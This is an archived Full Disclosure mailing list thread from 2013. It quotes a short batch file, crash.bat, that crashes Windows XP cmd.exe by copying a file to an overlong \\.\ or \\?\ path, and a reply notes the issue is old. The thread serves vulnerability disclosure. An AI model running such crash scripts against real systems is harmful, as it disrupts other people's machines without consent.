Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Windows XP cmd.exe crash

From: Joshua Thomas <rappercrazzy () gmail com>
Date: Mon, 1 Jul 2013 06:04:47 +0530
long file name exploit .... existing ....since  2001-2002


On Fri, Jun 28, 2013 at 6:47 PM, Pedro Laguna <pedlagdur () hotmail co uk>wrote:


Ey list! Just something quick and funny crash I found long time ago and it
may give some of you something to check this weekend.

Windows XP cmd.exe crash when trying to copy files with a very long name.
The following BATCH file can crash the cmd.exe process:

----------------------------------- crash.bat
--------------------------------------
@echo off
echo test > data.txt
copy "%CD%"\data.txt
\\.\C:\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.txt
REM copy "%CD%"\data.txt
\\?\C:\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.txt
---------------------------------- / crash.bat
----------------------------------------

It only happens with "copy" but not with "move" command and with both \\.\
and \\?\ prefixes. I'm not an expert on these fields so I don't know if it
will be possible to exploit it, maybe some of you with crazy kung fu skills
can do it. If not, it's just a weird behaviour for the cmd.exe and given
that is less than a year to the end of life of the Windows XP cannot see
any harm sharing it.

Ta!

--
Pedro Laguna

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: